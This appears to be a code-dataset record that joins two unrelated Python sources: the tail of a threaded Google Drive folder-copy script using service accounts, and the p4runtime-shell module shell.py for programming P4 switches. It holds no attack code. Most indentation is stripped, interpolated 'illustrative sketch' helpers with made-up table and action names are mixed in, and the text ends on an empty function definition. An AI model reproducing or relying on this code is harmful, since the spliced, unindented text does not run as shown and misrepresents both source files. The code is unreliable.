service = sa_info.service
src_info = Get(service, src)
dst_info = Get(service, dst)
Global.SearchFolderQueue.put(dst_info)
AsynListAll(worker)
dst_total_files_info = Global.INFO
Global.INFO = {}
Global.SearchFolderQueue.put(src_info)
AsynListAll(worker)
src_total_files_info = Global.INFO
Global.clear()
    copy_folders = queue.Queue()  # folders that do not exist in dst at all; copy them wholesale
    search_folders = queue.Queue()  # folders that also exist (by name) in dst; need further traversal
    copy_files = []  # files that do not exist in dst
search_folders.put((src, dst))
Global.Parallelism[src] = dst
while (search_folders.qsize() > 0):
src_uid, dst_uid = search_folders.get()
src_children = src_total_files_info[src_uid]
dst_children = dst_total_files_info[dst_uid]
for item in src_children:
if item not in dst_children:
if item.is_folder:
                    # look for folders that do not exist in the dst folder
copy_folders.put(item) #1
else:
                    # look for files that do not exist in the dst folder
copy_files.append(item) #2
for item_1 in src_children:
for item_2 in dst_children:
if (item_1.is_folder & item_2.is_folder & (item_1 == item_2)):
                    # folders with the same name go into the search queue
search_folders.put((item_1.uid, item_2.uid)) #3
Global.Parallelism[item_1.uid] = item_2.uid
for item in copy_files:
Global.CreateFileQueue.put(item)
while (copy_folders.qsize()):
info = copy_folders.get()
        Global.CreateFolderQueue.put(info)  # queue the folder just dequeued for creation
for item in src_total_files_info[info.uid]:
if item.is_folder:
copy_folders.put(item)
else:
Global.CreateFileQueue.put(item)
sa_info = SAManage.request()
service = sa_info.service
folder_list = []
while (Global.CreateFolderQueue.qsize() > 0):
cur_info = Global.CreateFolderQueue.get()
folder_list.append(cur_info)
while (len(folder_list) > 0):
cur_info = folder_list.pop()
try:
res_uid = CreateFolder(service, cur_info,
Global.Parallelism[cur_info.parent])
Global.Parallelism[cur_info.uid] = res_uid
except Exception as e:
print("{0} 触发错误, 无法创建文件夹: {1}".format(sa_info.uid, str(e)))
Global.logger.error(str(e))
folder_list.append(cur_info)
sa_info.cum_error += 1
SAManage.recycle(sa_info)
sa_info = SAManage.request()
service = sa_info.service
SAManage.recycle(sa_info)
status_with_exit = [False] * worker
lock = threading.Lock()
def task_2(index):
"""task_2 拷贝文件
Args:
index ([type]): 线程标识
"""
sa_info = SAManage.request()
service = sa_info.service
while (not all(status_with_exit)):
while ((Global.CreateFileQueue.qsize() > 0)
and (not Global.isExit)):
cur_info = Global.CreateFileQueue.get()
#print(cur_info.name)
lock.acquire()
status_with_exit[index] = False
lock.release()
try:
string = "thread: {0}\tcopy file {1}".format(
index, cur_info.name)
Global.logger.info(string)
Copy(service, cur_info.uid,
Global.Parallelism[cur_info.parent])
except Exception as e:
print("{0} 触发错误, 无法拷贝文件".format(sa_info.uid))
Global.logger.error(str(e))
Global.CreateFileQueue.put(cur_info)
sa_info.cum_error += 1
SAManage.recycle(sa_info)
sa_info = SAManage.request()
service = sa_info.service
status_with_exit[index] = True
time.sleep(1)
SAManage.recycle(sa_info)
threads = []
for i in range(worker):
t = threading.Thread(target=task_2, args=(i, ))
        t.start()  # start the thread, i.e. let it begin running
threads.append(t)
for t in threads:
t.join()
|
shell.py
|
# Copyright 2019 Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
from collections import Counter, namedtuple, OrderedDict
import enum
import logging
from threading import Thread
from IPython import start_ipython
from traitlets.config.loader import Config
from IPython.terminal.prompts import Prompts, Token
import os.path
import sys
from p4runtime_sh.p4runtime import P4RuntimeClient, P4RuntimeException, parse_p4runtime_error
from p4.v1 import p4runtime_pb2
from p4.config.v1 import p4info_pb2
from . import bytes_utils
from .global_options import global_options
from .context import P4RuntimeEntity, P4Type, Context
from .utils import UserError, InvalidP4InfoError
import google.protobuf.text_format
from google.protobuf import descriptor
import queue
context = Context()
client = None
class UserUsageError(UserError):
def __init__(self, usage):
self.usage = usage
def __str__(self):
return "Usage: " + self.usage
class NotSupportedYet(UserError):
def __init__(self, what):
self.what = what
def __str__(self):
return "{} is not supported yet".format(self.what)
class _PrintContext:
def __init__(self):
self.skip_one = False
self.stack = []
def find_table(self):
for msg in reversed(self.stack):
if msg.DESCRIPTOR.name == "TableEntry":
try:
return context.get_name_from_id(msg.table_id)
except KeyError:
return None
return None
def find_action(self):
for msg in reversed(self.stack):
if msg.DESCRIPTOR.name == "Action":
try:
return context.get_name_from_id(msg.action_id)
except KeyError:
return None
return None
def find_controller_packet_metadata(self):
for msg in reversed(self.stack):
if msg.DESCRIPTOR.name == "PacketIn":
return "packet_in"
if msg.DESCRIPTOR.name == "PacketOut":
return "packet_out"
return None
def _sub_object(field, value, pcontext):
id_ = value
try:
return context.get_name_from_id(id_)
except KeyError:
logging.error("Unknown object id {}".format(id_))
def _sub_mf(field, value, pcontext):
id_ = value
table_name = pcontext.find_table()
if table_name is None:
logging.error("Cannot find any table in context")
return
return context.get_mf_name(table_name, id_)
def _sub_ap(field, value, pcontext):
id_ = value
action_name = pcontext.find_action()
if action_name is None:
logging.error("Cannot find any action in context")
return
return context.get_param_name(action_name, id_)
def _sub_pkt_md(field, value, pcontext):
id_ = value
ctrl_pkt_md_name = pcontext.find_controller_packet_metadata()
return context.get_packet_metadata_name_from_id(ctrl_pkt_md_name, id_)
def _gen_pretty_print_proto_field(substitutions, pcontext):
def myPrintField(self, field, value):
self._PrintFieldName(field)
self.out.write(' ')
if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
# TODO(antonin): any kind of checks required?
self.out.write('\"')
self.out.write(''.join('\\\\x{:02x}'.format(b) for b in value))
self.out.write('\"')
else:
self.PrintFieldValue(field, value)
subs = None
if field.containing_type is not None:
subs = substitutions.get(field.containing_type.name, None)
if subs and field.name in subs and value != 0:
name = subs[field.name](field, value, pcontext)
self.out.write(' ("{}")'.format(name))
self.out.write(' ' if self.as_one_line else '\n')
return myPrintField
def _repr_pretty_proto(msg, substitutions):
"""A custom version of google.protobuf.text_format.MessageToString which represents Protobuf
messages with a more user-friendly string. In particular, P4Runtime ids are supplemented with
the P4 name and binary strings are displayed in hexadecimal format."""
pcontext = _PrintContext()
def message_formatter(message, indent, as_one_line):
        # For each message we do 2 passes: the first one updates the _PrintContext instance and
        # calls MessageToString again. The second pass returns None immediately (default handling by
        # text_format).
if pcontext.skip_one:
pcontext.skip_one = False
return
pcontext.stack.append(message)
pcontext.skip_one = True
s = google.protobuf.text_format.MessageToString(
message, indent=indent, as_one_line=as_one_line, message_formatter=message_formatter)
s = s[indent:-1]
pcontext.stack.pop()
return s
# We modify the "internals" of the text_format module which is not great as it may break in the
# future, but this enables us to keep the code fairly small.
saved_printer = google.protobuf.text_format._Printer.PrintField
google.protobuf.text_format._Printer.PrintField = _gen_pretty_print_proto_field(
substitutions, pcontext)
s = google.protobuf.text_format.MessageToString(msg, message_formatter=message_formatter)
google.protobuf.text_format._Printer.PrintField = saved_printer
return s
def _repr_pretty_p4info(msg):
substitutions = {
"Table": {"const_default_action_id": _sub_object,
"implementation_id": _sub_object,
"direct_resource_ids": _sub_object},
"ActionRef": {"id": _sub_object},
"ActionProfile": {"table_ids": _sub_object},
"DirectCounter": {"direct_table_id": _sub_object},
"DirectMeter": {"direct_table_id": _sub_object},
}
return _repr_pretty_proto(msg, substitutions)
def _repr_pretty_p4runtime(msg):
substitutions = {
"TableEntry": {"table_id": _sub_object},
"FieldMatch": {"field_id": _sub_mf},
"Action": {"action_id": _sub_object},
"Param": {"param_id": _sub_ap},
"ActionProfileMember": {"action_profile_id": _sub_object},
"ActionProfileGroup": {"action_profile_id": _sub_object},
"MeterEntry": {"meter_id": _sub_object},
"CounterEntry": {"counter_id": _sub_object},
"ValueSetEntry": {"value_set_id": _sub_object},
"RegisterEntry": {"register_id": _sub_object},
"DigestEntry": {"digest_id": _sub_object},
"DigestListAck": {"digest_id": _sub_object},
"DigestList": {"digest_id": _sub_object},
"PacketMetadata": {"metadata_id": _sub_pkt_md}
}
return _repr_pretty_proto(msg, substitutions)
class P4Object:
def __init__(self, obj_type, obj):
self.name = obj.preamble.name
self.id = obj.preamble.id
self._obj_type = obj_type
self._obj = obj
self.__doc__ = """
A wrapper around the P4Info Protobuf message for {} '{}'.
You can access any field from the message with <self>.<field name>.
You can access the name directly with <self>.name.
You can access the id directly with <self>.id.
If you need the underlying Protobuf message, you can access it with msg().
""".format(obj_type.pretty_name, self.name)
def __dir__(self):
d = ["info", "msg", "name", "id"]
if self._obj_type == P4Type.table:
d.append("actions")
return d
def _repr_pretty_(self, p, cycle):
p.text(_repr_pretty_p4info(self._obj))
def __str__(self):
return _repr_pretty_p4info(self._obj)
def __getattr__(self, name):
return getattr(self._obj, name)
    def __settattr__(self, name, value):
        raise UserError("Operation not supported")
def msg(self):
"""Get Protobuf message object"""
return self._obj
def info(self):
print(_repr_pretty_p4info(self._obj))
def actions(self):
"""Print list of actions, only for tables and action profiles."""
if self._obj_type == P4Type.table:
for action in self._obj.action_refs:
print(context.get_name_from_id(action.id))
elif self._obj_type == P4Type.action_profile:
t_id = self._obj.table_ids[0]
t_name = context.get_name_from_id(t_id)
t = context.get_table(t_name)
for action in t.action_refs:
print(context.get_name_from_id(action.id))
else:
raise UserError("'actions' is only available for tables and action profiles")
class P4Objects:
def __init__(self, obj_type):
self._obj_type = obj_type
self._names = sorted([name for name, _ in context.get_objs(obj_type)])
self._iter = None
self.__doc__ = """
All the {pnames} in the P4 program.
To access a specific {pname}, use {p4info}['<name>'].
You can use this class to iterate over all {pname} instances:
\tfor x in {p4info}:
\t\tprint(x.id)
""".format(pname=obj_type.pretty_name, pnames=obj_type.pretty_names, p4info=obj_type.p4info_name)
def __call__(self):
for name in self._names:
print(name)
def _ipython_key_completions_(self):
return self._names
def __getitem__(self, name):
obj = context.get_obj(self._obj_type, name)
if obj is None:
raise UserError("{} '{}' does not exist".format(
self._obj_type.pretty_name, name))
return P4Object(self._obj_type, obj)
def __setitem__(self, name, value):
raise UserError("Operation not allowed")
def _repr_pretty_(self, p, cycle):
p.text(self.__doc__)
def __iter__(self):
self._iter = iter(self._names)
return self
def __next__(self):
name = next(self._iter)
return self[name]
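# Illustrative sketch, not part of the original module: typical use of P4Objects to
# browse the loaded P4Info. Assumes a P4Info context has been set up, as it is
# elsewhere in this module; no specific program or table names are assumed.
def _example_list_tables():
    tables = P4Objects(P4Type.table)
    tables()  # print the fully-qualified name of every table in the P4 program
    for t in tables:  # iteration yields P4Object wrappers
        t.info()      # display the P4Info entry for the first table
        break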
class MatchKey:
def __init__(self, table_name, match_fields):
self._table_name = table_name
self._fields = OrderedDict()
self._fields_suffixes = {}
for mf in match_fields:
self._add_field(mf)
self._mk = OrderedDict()
self._set_docstring()
def _set_docstring(self):
self.__doc__ = "Match key fields for table '{}':\n\n".format(self._table_name)
for name, info in self._fields.items():
self.__doc__ += str(info)
self.__doc__ += """
Set a field value with <self>['<field_name>'] = '...'
* For exact match: <self>['<f>'] = '<value>'
* For ternary match: <self>['<f>'] = '<value>&&&<mask>'
* For LPM match: <self>['<f>'] = '<value>/<mask>'
* For range match: <self>['<f>'] = '<value>..<mask>'
* For optional match: <self>['<f>'] = '<value>'
If it's inconvenient to use the whole field name, you can use a unique suffix.
You may also use <self>.set(<f>='<value>')
\t(<f> must not include a '.' in this case, but remember that you can use a unique suffix)
"""
def _ipython_key_completions_(self):
return self._fields.keys()
def __dir__(self):
return ["clear"]
def _get_mf(self, name):
if name in self._fields:
return self._fields[name]
if name in self._fields_suffixes:
return self._fields[self._fields_suffixes[name]]
raise UserError(
"'{}' is not a valid match field name, nor a valid unique suffix, "
"for table '{}'".format(name, self._table_name))
def __setitem__(self, name, value):
field_info = self._get_mf(name)
self._mk[name] = self._parse_mf(value, field_info)
print(self._mk[name])
def __getitem__(self, name):
_ = self._get_mf(name)
print(self._mk.get(name, "Unset"))
def _parse_mf(self, s, field_info):
if type(s) is not str:
raise UserError("Match field value must be a string")
if field_info.match_type == p4info_pb2.MatchField.EXACT:
return self._parse_mf_exact(s, field_info)
elif field_info.match_type == p4info_pb2.MatchField.LPM:
return self._parse_mf_lpm(s, field_info)
elif field_info.match_type == p4info_pb2.MatchField.TERNARY:
return self._parse_mf_ternary(s, field_info)
elif field_info.match_type == p4info_pb2.MatchField.RANGE:
return self._parse_mf_range(s, field_info)
elif field_info.match_type == p4info_pb2.MatchField.OPTIONAL:
return self._parse_mf_optional(s, field_info)
else:
raise UserError("Unsupported match type for field:\n{}".format(field_info))
def _parse_mf_exact(self, s, field_info):
v = bytes_utils.parse_value(s.strip(), field_info.bitwidth)
return self._sanitize_and_convert_mf_exact(v, field_info)
def _sanitize_and_convert_mf_exact(self, value, field_info):
mf = p4runtime_pb2.FieldMatch()
mf.field_id = field_info.id
mf.exact.value = bytes_utils.make_canonical_if_option_set(value)
return mf
def _parse_mf_optional(self, s, field_info):
v = bytes_utils.parse_value(s.strip(), field_info.bitwidth)
return self._sanitize_and_convert_mf_optional(v, field_info)
def _sanitize_and_convert_mf_optional(self, value, field_info):
mf = p4runtime_pb2.FieldMatch()
mf.field_id = field_info.id
mf.optional.value = bytes_utils.make_canonical_if_option_set(value)
return mf
def _parse_mf_lpm(self, s, field_info):
try:
prefix, length = s.split('/')
prefix, length = prefix.strip(), length.strip()
except ValueError:
prefix = s
length = str(field_info.bitwidth)
prefix = bytes_utils.parse_value(prefix, field_info.bitwidth)
try:
length = int(length)
except ValueError:
raise UserError("'{}' is not a valid prefix length").format(length)
return self._sanitize_and_convert_mf_lpm(prefix, length, field_info)
def _sanitize_and_convert_mf_lpm(self, prefix, length, field_info):
if length == 0:
raise UserError(
"Ignoring LPM don't care match (prefix length of 0) as per P4Runtime spec")
mf = p4runtime_pb2.FieldMatch()
mf.field_id = field_info.id
mf.lpm.prefix_len = length
first_byte_masked = length // 8
if first_byte_masked == len(prefix):
mf.lpm.value = prefix
return mf
barray = bytearray(prefix)
transformed = False
r = length % 8
byte_mask = 0xff & ((0xff << (8 - r)))
if barray[first_byte_masked] & byte_mask != barray[first_byte_masked]:
transformed = True
barray[first_byte_masked] = barray[first_byte_masked] & byte_mask
for i in range(first_byte_masked + 1, len(prefix)):
if barray[i] != 0:
transformed = True
barray[i] = 0
if transformed:
print("LPM value was transformed to conform to the P4Runtime spec "
"(trailing bits must be unset)")
mf.lpm.value = bytes(bytes_utils.make_canonical_if_option_set(barray))
return mf
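# Worked example of the masking above (illustrative, hypothetical values): for a
# 32-bit field, prefix 0x0a012345 (10.1.35.69) with prefix length 20 gives
# first_byte_masked = 20 // 8 = 2, r = 20 % 8 = 4 and byte_mask = 0xf0, so byte 2
# becomes 0x23 & 0xf0 = 0x20 and byte 3 is zeroed: the value written to the switch
# is 0x0a012000 (10.1.32.0), i.e. every bit past the prefix is unset.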
def _parse_mf_ternary(self, s, field_info):
try:
value, mask = s.split('&&&')
value, mask = value.strip(), mask.strip()
except ValueError:
value = s.strip()
mask = "0b" + ("1" * field_info.bitwidth)
value = bytes_utils.parse_value(value, field_info.bitwidth)
mask = bytes_utils.parse_value(mask, field_info.bitwidth)
return self._sanitize_and_convert_mf_ternary(value, mask, field_info)
def _sanitize_and_convert_mf_ternary(self, value, mask, field_info):
if int.from_bytes(mask, byteorder='big') == 0:
raise UserError("Ignoring ternary don't care match (mask of 0s) as per P4Runtime spec")
mf = p4runtime_pb2.FieldMatch()
mf.field_id = field_info.id
barray = bytearray(value)
transformed = False
for i in range(len(value)):
if barray[i] & mask[i] != barray[i]:
transformed = True
barray[i] = barray[i] & mask[i]
if transformed:
print("Ternary value was transformed to conform to the P4Runtime spec "
"(masked off bits must be unset)")
mf.ternary.value = bytes(bytes_utils.make_canonical_if_option_set(barray))
mf.ternary.mask = bytes_utils.make_canonical_if_option_set(mask)
return mf
def _parse_mf_range(self, s, field_info):
try:
start, end = s.split('..')
start, end = start.strip(), end.strip()
except ValueError:
raise UserError("'{}' does not specify a valid range, use '<start>..<end>'").format(
s)
start = bytes_utils.parse_value(start, field_info.bitwidth)
end = bytes_utils.parse_value(end, field_info.bitwidth)
return self._sanitize_and_convert_mf_range(start, end, field_info)
def _sanitize_and_convert_mf_range(self, start, end, field_info):
# It's a bit silly: the fields are converted from str to int to bytes by bytes_utils, then
# converted back to int here...
start_ = int.from_bytes(start, byteorder='big')
end_ = int.from_bytes(end, byteorder='big')
if start_ > end_:
raise UserError("Invalid range match: start is greater than end")
if start_ == 0 and end_ == ((1 << field_info.bitwidth) - 1):
raise UserError(
"Ignoring range don't care match (all possible values) as per P4Runtime spec")
mf = p4runtime_pb2.FieldMatch()
mf.field_id = field_info.id
mf.range.low = bytes_utils.make_canonical_if_option_set(start)
mf.range.high = bytes_utils.make_canonical_if_option_set(end)
return mf
def _add_field(self, field_info):
self._fields[field_info.name] = field_info
self._recompute_suffixes()
def _recompute_suffixes(self):
suffixes = {}
suffix_count = Counter()
for fname in self._fields:
suffix = None
for s in reversed(fname.split(".")):
suffix = s if suffix is None else s + "." + suffix
suffixes[suffix] = fname
suffix_count[suffix] += 1
for suffix, c in suffix_count.items():
if c > 1:
del suffixes[suffix]
self._fields_suffixes = suffixes
def __str__(self):
return '\n'.join([str(mf) for name, mf in self._mk.items()])
def _repr_pretty_(self, p, cycle):
for name, mf in self._mk.items():
p.text(str(mf))
def set(self, **kwargs):
for name, value in kwargs.items():
self[name] = value
def clear(self):
self._mk.clear()
def _count(self):
return len(self._mk)
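# Illustrative sketch, not part of the original module: building a MatchKey directly
# from a table's P4Info entry. The table name 'ipv4_lpm' and the field name
# 'hdr.ipv4.dstAddr' are hypothetical placeholders.
def _example_match_key():
    t = P4Objects(P4Type.table)["ipv4_lpm"]
    mk = MatchKey("ipv4_lpm", t.match_fields)
    # Values are strings; the field's match type decides how the string is parsed:
    # '<value>/<len>' for LPM, '<value>&&&<mask>' for ternary, '<value>' for exact, ...
    mk["hdr.ipv4.dstAddr"] = "10.0.0.0/8"
    mk.set(dstAddr="10.1.0.0/16")  # a unique suffix of the field name also works
    print(mk)
    mk.clear()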
class Action:
def __init__(self, action_name=None):
self._init = False
if action_name is None:
raise UserError("Please provide name for action")
self.action_name = action_name
action_info = context.get_action(action_name)
if action_info is None:
raise UserError("Unknown action '{}'".format(action_name))
self._action_id = action_info.preamble.id
self._params = OrderedDict()
for param in action_info.params:
self._params[param.name] = param
self._action_info = action_info
self._param_values = OrderedDict()
self._set_docstring()
self._init = True
def _set_docstring(self):
self.__doc__ = "Action parameters for action '{}':\n\n".format(self.action_name)
for name, info in self._params.items():
self.__doc__ += str(info)
self.__doc__ += "\n\n"
self.__doc__ += "Set a param value with <self>['<param_name>'] = '<value>'\n"
self.__doc__ += "You may also use <self>.set(<param_name>='<value>')\n"
def _ipython_key_completions_(self):
return self._params.keys()
def __dir__(self):
return ["action_name", "msg", "set"]
def _get_param(self, name):
if name not in self._params:
raise UserError(
"'{}' is not a valid action parameter name for action '{}'".format(
name, self.action_name))
return self._params[name]
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
if name == "action_name":
raise UserError("Cannot change action name")
super().__setattr__(name, value)
def __setitem__(self, name, value):
param_info = self._get_param(name)
self._param_values[name] = self._parse_param(value, param_info)
print(self._param_values[name])
def __getitem__(self, name):
_ = self._get_param(name)
print(self._param_values.get(name, "Unset"))
def _parse_param(self, s, param_info):
if type(s) is not str:
raise UserError("Action parameter value must be a string")
v = bytes_utils.parse_value(s, param_info.bitwidth)
p = p4runtime_pb2.Action.Param()
p.param_id = param_info.id
p.value = bytes_utils.make_canonical_if_option_set(v)
return p
def msg(self):
msg = p4runtime_pb2.Action()
msg.action_id = self._action_id
msg.params.extend(self._param_values.values())
return msg
def _from_msg(self, msg):
assert(self._action_id == msg.action_id)
self._param_values.clear()
for p in msg.params:
p_name = context.get_param_name(self.action_name, p.param_id)
self._param_values[p_name] = p
def __str__(self):
return str(self.msg())
def _repr_pretty_(self, p, cycle):
p.text(str(self.msg()))
def set(self, **kwargs):
for name, value in kwargs.items():
self[name] = value
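# Illustrative sketch, not part of the original module: building an Action and
# filling its parameters. The action name 'set_nhop' and the parameter names
# 'nhop' / 'port' are hypothetical; values are strings, as for match fields.
def _example_action():
    a = Action("set_nhop")
    a["nhop"] = "0x0a000001"
    a["port"] = "1"
    # Equivalent: a.set(nhop="0x0a000001", port="1")
    return a.msg()  # the p4runtime_pb2.Action message that will be sent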
class _EntityBase:
def __init__(self, entity_type, p4runtime_cls, modify_only=False):
self._init = False
self._entity_type = entity_type
self._entry = p4runtime_cls()
self._modify_only = modify_only
def __dir__(self):
d = ["msg", "read"]
if self._modify_only:
d.append("modify")
else:
d.extend(["insert", "modify", "delete"])
return d
# to be called before issuing a P4Runtime request
# enforces checks that cannot be performed when setting individual fields
def _validate_msg(self):
return True
def _update_msg(self):
pass
def __str__(self):
self._update_msg()
return str(_repr_pretty_p4runtime(self._entry))
def _repr_pretty_(self, p, cycle):
self._update_msg()
p.text(_repr_pretty_p4runtime(self._entry))
def __getattr__(self, name):
raise AttributeError("'{}' object has no attribute '{}'".format(
self.__class__.__name__, name))
def msg(self):
self._update_msg()
return self._entry
def _write(self, type_):
self._update_msg()
self._validate_msg()
update = p4runtime_pb2.Update()
update.type = type_
getattr(update.entity, self._entity_type.name).CopyFrom(self._entry)
client.write_update(update)
def insert(self):
if self._modify_only:
raise NotImplementedError("Insert not supported for {}".format(self._entity_type.name))
logging.debug("Inserting entry")
self._write(p4runtime_pb2.Update.INSERT)
def delete(self):
if self._modify_only:
raise NotImplementedError("Delete not supported for {}".format(self._entity_type.name))
logging.debug("Deleting entry")
self._write(p4runtime_pb2.Update.DELETE)
def modify(self):
logging.debug("Modifying entry")
self._write(p4runtime_pb2.Update.MODIFY)
def _from_msg(self, msg):
raise NotImplementedError
def read(self, function=None):
# Entities should override this method and provide a helpful docstring
self._update_msg()
self._validate_msg()
entity = p4runtime_pb2.Entity()
getattr(entity, self._entity_type.name).CopyFrom(self._entry)
iterator = client.read_one(entity)
# Cannot use a (simpler) generator here as we need to decorate __next__ with
# @parse_p4runtime_error.
class _EntryIterator:
def __init__(self, entity, it):
self._entity = entity
self._it = it
self._entities_it = None
def __iter__(self):
return self
@parse_p4runtime_error
def __next__(self):
if self._entities_it is None:
rep = next(self._it)
self._entities_it = iter(rep.entities)
try:
entity = next(self._entities_it)
except StopIteration:
self._entities_it = None
return next(self)
if isinstance(self._entity, _P4EntityBase):
e = type(self._entity)(self._entity.name) # create new instance of same entity
else:
e = type(self._entity)()
msg = getattr(entity, self._entity._entity_type.name)
e._from_msg(msg)
# neither of these should be needed
# e._update_msg()
# e._entry.CopyFrom(msg)
return e
if function is None:
return _EntryIterator(self, iterator)
else:
for x in _EntryIterator(self, iterator):
function(x)
class _P4EntityBase(_EntityBase):
def __init__(self, p4_type, entity_type, p4runtime_cls, name=None, modify_only=False):
super().__init__(entity_type, p4runtime_cls, modify_only)
self._p4_type = p4_type
if name is None:
raise UserError("Please provide name for {}".format(p4_type.pretty_name))
self.name = name
self._info = P4Objects(p4_type)[name]
self.id = self._info.id
def __dir__(self):
return super().__dir__() + ["name", "id", "info"]
def info(self):
"""Display P4Info entry for the object"""
return self._info
class ActionProfileMember(_P4EntityBase):
def __init__(self, action_profile_name=None):
super().__init__(
P4Type.action_profile, P4RuntimeEntity.action_profile_member,
p4runtime_pb2.ActionProfileMember, action_profile_name)
self.member_id = 0
self.action = None
self._valid_action_ids = self._get_action_set()
self.__doc__ = """
An action profile member for '{}'
Use <self>.info to display the P4Info entry for the action profile.
Set the member id with <self>.member_id = <expr>.
To set the action specification <self>.action = <instance of type Action>.
To set the value of action parameters, use <self>.action['<param name>'] = <expr>.
Type <self>.action? for more details.
Typical usage to insert an action profile member:
m = action_profile_member['<action_profile_name>'](action='<action_name>', member_id=1)
m.action['<p1>'] = ...
...
m.action['<pM>'] = ...
# OR m.action.set(p1=..., ..., pM=...)
m.insert
For information about how to read members, use <self>.read?
""".format(action_profile_name)
self._init = True
def __dir__(self):
return super().__dir__() + ["member_id", "action"]
def _get_action_set(self):
t_id = self._info.table_ids[0]
t_name = context.get_name_from_id(t_id)
t = context.get_table(t_name)
return set([action.id for action in t.action_refs])
def __call__(self, **kwargs):
for name, value in kwargs.items():
if name == "action" and type(value) is str:
value = Action(value)
setattr(self, name, value)
return self
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
if name == "name":
raise UserError("Cannot change action profile name")
if name == "member_id":
if type(value) is not int:
raise UserError("member_id must be an integer")
if name == "action" and value is not None:
if not isinstance(value, Action):
raise UserError("action must be an instance of Action")
if not self._is_valid_action_id(value._action_id):
raise UserError("action '{}' is not a valid action for this action profile".format(
value.action_name))
super().__setattr__(name, value)
def _is_valid_action_id(self, action_id):
return action_id in self._valid_action_ids
def _update_msg(self):
self._entry.action_profile_id = self.id
self._entry.member_id = self.member_id
if self.action is not None:
self._entry.action.CopyFrom(self.action.msg())
def _from_msg(self, msg):
self.member_id = msg.member_id
if msg.HasField('action'):
action = msg.action
action_name = context.get_name_from_id(action.action_id)
self.action = Action(action_name)
self.action._from_msg(action)
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the appropriate fields unset).
If function is None, returns an iterator. Iterate over it to get all the
members (as ActionProfileMember instances) returned by the
server. Otherwise, function is applied to all the members returned
by the server.
"""
return super().read(function)
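# Illustrative sketch, not part of the original module: inserting and reading back
# action profile members. The action profile name 'ecmp_selector' and the action
# name 'set_nhop' are hypothetical; a configured context/client is assumed, as in
# the rest of this module.
def _example_action_profile_member():
    m = ActionProfileMember("ecmp_selector")(member_id=1, action="set_nhop")
    m.action["port"] = "2"
    m.insert()
    for member in ActionProfileMember("ecmp_selector").read():  # wildcard read
        print(member)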
class GroupMember:
"""
A member in an ActionProfileGroup.
Construct with GroupMember(<member_id>, weight=<weight>, watch=<watch>,
watch_port=<watch_port>).
You can set / get attributes member_id (required), weight (default 1), watch (default 0),
watch_port (default "").
"""
def __init__(self, member_id=None, weight=1, watch=0, watch_port=b""):
if member_id is None:
raise UserError("member_id is required")
self._msg = p4runtime_pb2.ActionProfileGroup.Member()
self._msg.member_id = member_id
self._msg.weight = weight
if watch:
self._msg.watch = watch
if watch_port:
self._msg.watch_port = watch_port
def __dir__(self):
return ["member_id", "weight", "watch", "watch_port"]
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
if name == "member_id":
if type(value) is not int:
raise UserError("member_id must be an integer")
self._msg.member_id = value
return
if name == "weight":
if type(value) is not int:
raise UserError("weight must be an integer")
self._msg.weight = value
return
if name == "watch":
if type(value) is not int:
raise UserError("watch must be an integer")
self._msg.watch = value
return
if name == "watch_port":
if type(value) is not bytes:
raise UserError("watch_port must be a byte string")
self._msg.watch_port = value
return
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "member_id":
return self._msg.member_id
if name == "weight":
return self._msg.weight
if name == "watch":
return self._msg.watch
if name == "watch_port":
return self._msg.watch_port
return super().__getattr__(name)
def __str__(self):
return str(self._msg)
def _repr_pretty_(self, p, cycle):
p.text(str(self._msg))
class ActionProfileGroup(_P4EntityBase):
def __init__(self, action_profile_name=None):
super().__init__(
P4Type.action_profile, P4RuntimeEntity.action_profile_group,
p4runtime_pb2.ActionProfileGroup, action_profile_name)
self.group_id = 0
self.max_size = 0
self.members = []
self.__doc__ = """
An action profile group for '{}'
Use <self>.info to display the P4Info entry for the action profile.
Set the group id with <self>.group_id = <expr>. Default is 0.
Set the max size with <self>.max_size = <expr>. Default is 0.
Add members to the group with <self>.add(<member_id>, weight=<weight>, watch=<watch>,
watch_port=<watch_port>).
weight, watch and watch port are optional (default to 1, 0 and "" respectively).
Typical usage to insert an action profile group:
g = action_profile_group['<action_profile_name>'](group_id=1)
g.add(<member id 1>)
g.add(<member id 2>)
# OR g.add(<member id 1>).add(<member id 2>)
For information about how to read groups, use <self>.read?
""".format(action_profile_name)
self._init = True
def __dir__(self):
return super().__dir__() + ["group_id", "max_size", "members", "add", "clear"]
def __call__(self, **kwargs):
for name, value in kwargs.items():
setattr(self, name, value)
return self
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
if name == "name":
raise UserError("Cannot change action profile name")
elif name == "group_id":
if type(value) is not int:
raise UserError("group_id must be an integer")
elif name == "members":
if type(value) is not list:
raise UserError("members must be a list of GroupMember objects")
for m in value:
if type(m) is not GroupMember:
raise UserError("members must be a list of GroupMember objects")
super().__setattr__(name, value)
def add(self, member_id=None, weight=1, watch=0, watch_port=b""):
"""Add a member to the members list."""
self.members.append(GroupMember(member_id, weight, watch, watch_port))
return self
def clear(self):
"""Empty members list."""
self.members = []
def _update_msg(self):
self._entry.action_profile_id = self.id
self._entry.group_id = self.group_id
self._entry.max_size = self.max_size
del self._entry.members[:]
for member in self.members:
if type(member) is not GroupMember:
raise UserError("members must be a list of GroupMember objects")
m = self._entry.members.add()
m.CopyFrom(member._msg)
def _from_msg(self, msg):
self.group_id = msg.group_id
self.max_size = msg.max_size
self.members = []
for member in msg.members:
self.add(member.member_id, member.weight, member.watch, member.watch_port)
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the appropriate fields unset).
If function is None, returns an iterator. Iterate over it to get all the
members (as ActionProfileGroup instances) returned by the
server. Otherwise, function is applied to all the groups returned by the
server.
"""
return super().read(function)
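# Illustrative sketch, not part of the original module: grouping previously inserted
# members. 'ecmp_selector' and the member ids are hypothetical.
def _example_action_profile_group():
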